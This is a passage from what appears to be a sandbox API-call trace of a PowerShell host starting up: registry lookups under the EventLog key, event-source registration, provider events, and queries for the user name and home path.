	[0062.909] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae724, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae720, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae724*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae720*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.910] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.911] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x358) returned 0x0
	[0062.911] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.911] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x35c) returned 0x0
	[0062.911] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.911] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x360) returned 0x0
	[0062.911] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.912] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x364) returned 0x0
	[0062.912] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.912] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x368) returned 0x0
	[0062.912] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.912] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x36c) returned 0x0
	[0062.912] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.912] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x370) returned 0x0
	[0062.912] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.912] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x374) returned 0x0
	[0062.912] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.913] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x378) returned 0x0
	[0062.913] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x37c) returned 0x0
	[0062.913] RegCloseKey (hKey=0x37c) returned 0x0
	[0062.913] RegCloseKey (hKey=0x354) returned 0x0
	[0062.913] RegCloseKey (hKey=0x378) returned 0x0
	[0062.913] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6bc | out: phkResult=0xae6bc*=0x378) returned 0x0
	[0062.913] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae724, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae720, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae724*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae720*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.913] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.913] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.913] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x242ad0, lpcchName=0xae740, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae740, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.914] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x354) returned 0x0
	[0062.914] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.915] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x37c) returned 0x0
	[0062.915] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.915] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x380) returned 0x0
	[0062.915] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.915] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x384) returned 0x0
	[0062.915] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.915] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x388) returned 0x0
	[0062.916] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.916] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x38c) returned 0x0
	[0062.916] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.916] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x390) returned 0x0
	[0062.917] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.917] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x394) returned 0x0
	[0062.917] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x0) returned 0x2
	[0062.917] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x398) returned 0x0
	[0062.917] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6ec | out: phkResult=0xae6ec*=0x39c) returned 0x0
	[0062.917] RegCloseKey (hKey=0x39c) returned 0x0
	[0062.917] RegCloseKey (hKey=0x378) returned 0x0
	[0062.917] RegCloseKey (hKey=0x398) returned 0x0
	[0062.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6b0 | out: phkResult=0xae6b0*=0x398) returned 0x0
	[0062.918] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae718, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae714, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae718*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae714*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.918] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.918] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.918] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.918] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.918] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.918] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.919] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.919] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.919] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x242ad0, lpcchName=0xae734, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae734, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0062.919] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x378) returned 0x0
	[0062.919] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.919] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x39c) returned 0x0
	[0062.919] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.919] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3a0) returned 0x0
	[0062.919] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.919] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3a4) returned 0x0
	[0062.920] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.920] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3a8) returned 0x0
	[0062.920] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.920] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3ac) returned 0x0
	[0062.920] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.920] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3b0) returned 0x0
	[0062.920] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.920] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3b4) returned 0x0
	[0062.920] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x0) returned 0x2
	[0062.921] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3b8) returned 0x0
	[0062.921] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae6e0 | out: phkResult=0xae6e0*=0x3bc) returned 0x0
	[0062.921] RegCloseKey (hKey=0x3bc) returned 0x0
	[0062.921] RegCloseKey (hKey=0x398) returned 0x0
	[0062.921] RegCloseKey (hKey=0x3b8) returned 0x0
	[0062.923] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4350004
	[0062.937] GetLastError () returned 0x0
	[0062.938] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x28fde0c*="WSMan", lpRawData=0x28fdcb4) returned 1
	[0062.938] GetLastError () returned 0x0
	[0062.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.939] GetLastError () returned 0xcb
	[0062.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.940] GetLastError () returned 0xcb
	[0062.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.940] GetLastError () returned 0xcb
	[0062.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.940] GetLastError () returned 0xcb
	[0062.940] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.940] GetLastError () returned 0xcb
	[0062.940] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.940] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2901cb0*="Alias", lpRawData=0x2901b6c) returned 1
	[0062.941] GetLastError () returned 0x0
	[0062.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.942] GetLastError () returned 0xcb
	[0062.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.942] GetLastError () returned 0xcb
	[0062.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.942] GetLastError () returned 0xcb
	[0062.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae204, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.942] GetLastError () returned 0xcb
	[0062.942] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x20d6a0, nSize=0xae854 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0xae854) returned 0x1
	[0062.942] GetLastError () returned 0xcb
	[0062.943] GetUserNameW (in: lpBuffer=0x242ad0, pcbBuffer=0xae85c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0xae85c) returned 1
	[0062.943] ReportEventW (hEventLog=0x4350004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2905c0c*="Environment", lpRawData=0x2905ac8) returned 1
	[0062.943] GetLastError () returned 0x0
	[0062.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.944] GetLastError () returned 0xcb
	[0062.944] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0062.944] GetLastError () returned 0xcb
	[0062.944] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="\\Users\\2XC7u663GxWc") returned 0x13
	[0062.944] GetLastError () returned 0xcb
	[0062.945] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0xae384, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0062.945] GetLastError () returned 0xcb
	[0062.945] SetErrorMode (uMode=0x1) returned 0x1
	[0062.945] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0xae804 | out: lpFileInformation=0xae804*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0062.945] GetLastError () returned 0xcb
	[0062.945] SetErrorMode (uMode=0x1) returned 0x1
